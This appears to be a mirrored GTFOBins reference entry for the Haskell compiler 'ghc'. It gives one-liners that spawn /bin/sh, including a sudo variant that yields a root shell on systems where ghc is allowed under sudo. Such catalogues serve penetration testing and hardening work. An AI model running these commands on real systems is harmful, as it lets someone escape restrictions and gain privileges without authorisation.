mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
8 lines
157 B
Markdown
8 lines
157 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: ghc -e 'System.Process.callCommand "/bin/sh"'
|
|
sudo:
|
|
- code: sudo ghc -e 'System.Process.callCommand "/bin/sh"'
|
|
---
|